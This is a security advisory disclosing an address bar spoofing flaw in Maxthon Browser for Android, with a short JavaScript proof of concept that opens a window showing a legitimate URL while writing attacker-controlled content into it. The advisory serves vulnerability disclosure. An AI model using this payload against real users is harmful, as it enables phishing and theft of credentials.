Product: Maxthon Browser
#Vulnerability: Address Bar Spoofing Vulnerability
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: https://rafayhackingarticles.net

*Introduction*

Maxthon browser for Android was prone to an "Address Bar Spoofing"
vulnerability wdue to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.

*POC*

Following is the POC that could be used to reproduce the issue:

<script> document.getElementById('one').onclick = function() {
myWindow=window.open('https://rafayhackingarticles.net/','RHA','width=300,height=300,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still
being hosted another domain, however the domain is pointing to
rafayhackingarticles.net.</b><br><br><iframe src=\"
https://www.rafayhackingarticles.net/\");></iframe></scri+pt></body></html>");
myWindow.focus(); return false; } </script>


*impact*

The issue could be abused to carry out more effective phishing attacks
against it's users.

*Fix*

We tried to contact the vendor several times however we did not recieve any
response